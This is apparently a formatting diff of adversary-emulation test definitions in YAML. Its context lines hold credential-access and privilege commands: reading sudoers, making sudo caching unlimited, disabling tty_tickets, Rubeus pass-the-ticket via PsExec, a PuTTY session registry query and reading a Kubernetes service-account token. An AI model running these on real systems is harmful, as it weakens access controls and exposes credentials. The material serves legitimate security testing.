  auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
  description: |
    Common Sudo enumeration methods.

  supported_platforms:
-    - linux
+  - linux

  dependency_executor_name: sh
  dependencies:
@@ -44,16 +42,14 @@ atomic_tests:
      sudo -l      
      sudo cat /usr/local/etc/sudoers
      sudo ee /usr/local/etc/sudoers
-
-
 - name: Unlimited sudo cache timeout
  auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
  description: |
    Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
-    - macos
-    - linux
+  - macos
+  - linux

  executor:
    name: sh
@@ -61,14 +57,13 @@ atomic_tests:
    command: |
      sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
      sudo visudo -c -f /etc/sudoers
-
 - name: Unlimited sudo cache timeout (freebsd)
  auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
  description: |
    Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
-    - linux
+  - linux

  dependency_executor_name: sh
  dependencies:
@@ -85,16 +80,14 @@ atomic_tests:
    command: |
      sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
      sudo visudo -c -f /usr/local/etc/sudoers
-
-
 - name: Disable tty_tickets for sudo caching
  auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
  description: |
    Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
-    - macos
-    - linux
+  - macos
+  - linux

  executor:
    name: sh
@@ -102,14 +95,13 @@ atomic_tests:
    command: |
      sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
      sudo visudo -c -f /etc/sudoers
-
 - name: Disable tty_tickets for sudo caching (freebsd)
  auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
  description: |
    Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
-    - linux
+  - linux

  dependency_executor_name: sh
  dependencies:
@@ -123,7 +115,6 @@ atomic_tests:
  executor:
    name: sh
    elevation_required: true
-    command: |
+    command: |-
      sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
      sudo visudo -c -f /usr/local/etc/sudoers
-     
@@ -83,11 +83,11 @@ atomic_tests:
  executor:
    name: powershell
    elevation_required: true
-    command: |
+    command: |-
      & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
      Set-Location "PathToAtomicsFolder\..\ExternalPayloads"
      Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi
      Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local"
      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi"
-      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge      
+      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge
@@ -22,4 +22,4 @@ atomic_tests:
  executor:
    command: |
      reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
-    name: command_prompt
+    name: command_prompt
@@ -368,7 +368,7 @@ atomic_tests:
      }
      catch { }
    name: powershell
-    elevation_required: true 
+    elevation_required: true
 - name: Export Certificates with Mimikatz
  auto_generated_guid: 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86
  description: |
@@ -101,5 +101,5 @@ atomic_tests:
    command: |
      kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
    name: sh
-    cleanup_command: |
+    cleanup_command: |-
      kubectl --context kind-atomic-cluster delete pod atomic-pod
--- a/Show More
+++ b/Show More